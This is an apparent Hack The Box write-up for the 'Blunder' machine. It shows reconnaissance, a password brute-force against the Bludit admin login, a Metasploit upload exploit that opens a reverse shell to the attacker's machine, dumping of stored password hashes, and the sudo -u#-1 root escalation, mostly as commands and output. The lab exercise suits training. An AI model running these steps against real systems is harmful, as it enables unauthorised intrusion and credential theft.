Blunder
HTB Writer Up
Lets start with nmap
root@liberty:/home/kali# nmap blunder.htb
Starting Nmap 7.91 ( https://nmap.org )
Nmap scan report for blunder.htb (10.129.4.41)
Host is up (0.019s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE
21/tcp closed ftp
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 4.82 seconds
root@liberty:/home/kali# nmap -sV blunder.htb
Starting Nmap 7.91 ( https://nmap.org )
Nmap scan report for blunder.htb (10.129.4.41)
Host is up (0.015s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
21/tcp closed ftp
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.65 seconds
root@liberty:/home/kali# Next is Nikto - Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers:
root@liberty:/home/kali# nikto -h blunder.htb
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.129.4.41
+ Target Hostname: blunder.htb
+ Target Port: 80
+ Start Time: 2020-10-13 13:32:20 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ Retrieved x-powered-by header: Bludit
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ All CGI directories 'found', use '-C none' to test none
+ "robots.txt" contains 1 entry which should be manually viewed.Next we will enumerate some directories with Dirb - DIRB is a Web Content Scanner. It looks for existing (and/or hidden) Web Objects. It basically works by launching a dictionary based attack against a web server and analyzing the response
This allows us to quickly locate interesting directories such as admin portals:
We also find the find site. This site has a lot of words. I think this is a perfect time for CeWL.
root@liberty:~# cewl -d 5 -m 3 -w wordlist http://blunder.htb
CeWL 5.4.8 (Inclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
root@liberty:~# ls
Desktop Documents Downloads htb Music Pictures Public Templates Videos wordlist
root@liberty:~# cat wordlist
the
Load
Plugins
and
for
Include
Site
Page
has
About
King
with
USB
Begin
more
End
service
from
Stadia
Dynamic
...After fuzzing with dirb i came across this information on /to.txt
-Inform fergus that the new blog needs images - PENDINGI'm thinking that fergus might be a username. Also after doing a quick google I came across this exploit:
There are a couple of ruby requirements for this exploit so lets install them now.
root@liberty:~/htb# gem install httpclient
Fetching httpclient-2.8.3.gem
Successfully installed httpclient-2.8.3
Parsing documentation for httpclient-2.8.3
Installing ri documentation for httpclient-2.8.3
Done installing documentation for httpclient after 0 seconds
1 gem installed
root@liberty:~/htb# gem install docopt
Fetching docopt-0.6.1.gem
Successfully installed docopt-0.6.1
Parsing documentation for docopt-0.6.1
Installing ri documentation for docopt-0.6.1
Done installing documentation for docopt after 0 seconds
1 gem installed
root@liberty:~/htb#
Lets give this exploit a try:
root@liberty:~/htb# ruby blut-bf.rb -r http://blunder.htb/admin/ -u fergus -w ../wordlist
[*] Trying password: the
[*] Trying password: Load
[*] Trying password: Plugins
[*] Trying password: and
[*] Trying password: for
[*] Trying password: Include
[*] Trying password: Site
[*] Trying password: Page
[*] Trying password: has
[*] Trying password: About
[*] Trying password: King
[*] Trying password: with
[*] Trying password: USB
[*] Trying password: Begin
...
[+] Password found: RolandDeschainWith these creds we how have access to the admin portal. After googling "blundit admin portal exploit" I came across this article:
Looks like there is also a Metasploit moduleshell
msf5 exploit(linux/http/bludit_upload_images_exec) > run
[*] Started reverse TCP handler on 10.10.14.45:4444
[+] Logged in as: fergus
[*] Retrieving UUID...
[*] Uploading ZTJkGHVYBh.png...
[*] Uploading .htaccess...
[*] Executing ZTJkGHVYBh.png...
[*] Sending stage (38288 bytes) to 10.129.4.41
[*] Meterpreter session 1 opened (10.10.14.45:4444 -> 10.129.4.41:59626) at 2020-10-13 16:08:49 -0400
[+] Deleted .htaccess
meterpreter > shell
Process 4834 created.
Channel 1 created.
whoami
www-data
Lets stablize this shell
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@blunder:/var/www/bludit-3.9.2/bl-content/tmp$Lets begin our enumeration both manually and automated. To automate we will use linenum.sh:
root@liberty:~/htb# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.4.41 - - [TBD] "GET /linenum.sh HTTP/1.1" 200Grep the contents on the application looking for phrases such as auth, password, and key we come across this result for users.php
cat users.php
<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
"admin": {
"nickname": "Admin",
"firstName": "Administrator",
"lastName": "",
"role": "admin",
"password": "bfcc887f62e36ea019e3295aafb8a3885966e265",
"salt": "5dde2887e7aca",
"email": "",
"registered": "2019-11-27 07:40:55",
"tokenRemember": "",
"tokenAuth": "b380cb62057e9da47afce66b4615107d",
"tokenAuthTTL": "2009-03-15 14:00",
"twitter": "",
"facebook": "",
"instagram": "",
"codepen": "",
"linkedin": "",
"github": "",
"gitlab": ""
},
"fergus": {
"firstName": "",
"lastName": "",
"nickname": "",
"description": "",
"role": "author",
"password": "be5e169cdf51bd4c878ae89a0a89de9cc0c9d8c7",
"salt": "jqxpjfnv",
"email": "",
"registered": "2019-11-27 13:26:44",
"tokenRemember": "",
"tokenAuth": "0e8011811356c0c5bd2211cba8c50471",
"tokenAuthTTL": "2009-03-15 14:00",
"twitter": "",
"facebook": "",
"codepen": "",
"instagram": "",
"github": "",
"gitlab": "",
"linkedin": "",
"mastodon": ""
}
}www-data@blunder:/var/www/bludit-3.9.2/bl-content/databases$Lets user hash-identifier to see what we are dealing with here:
root@liberty:~/htb# hash-identifier
#########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
# By Zion3R #
# www.Blackploit.com #
# Root@Blackploit.com #
#########################################################################
--------------------------------------------------
HASH: bfcc887f62e36ea019e3295aafb8a3885966e265
Possible Hashs:
[+] SHA-1
[+] MySQL5 - SHA-1(SHA-1($pass))
This hash can be cracked online. Let use the password to access the system with this user.
www-data@blunder:/var/www/bludit-3.9.2/bl-content/databases$ su hugo su hugo Password: Password120Lets locate the user flag now that we have access outside of our php shell.
hugo@blunder:~$ ls
ls
Desktop Downloads Pictures Templates Videos
Documents Music Public user.txt
hugo@blunder:~$ cat user.txt
cat user.txt
FLAG HEREWe can check our sudo permission using sudo -l
hugo@blunder:/var/www/bludit-3.9.2/bl-content/databases$ sudo -l
sudo -l
Password: Password120
Matching Defaults entries for hugo on blunder:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User hugo may run the following commands on blunder:
(ALL, !root) /bin/bash
hugo@blunder:/var/www/bludit-3.9.2/bl-content/databases$After some googling we come across this exploit:
They don't come any easier than this. Looks like our privilege escalation require this one line of code - sudo -u#-1 /bin/bash
hugo@blunder:~$ sudo -u#-1 /bin/bash
sudo -u#-1 /bin/bash
root@blunder:/home/hugo# cat /root/root.txt
cat /root/root.txt
FLAG HERE
root@blunder:/home/hugo# Last updated
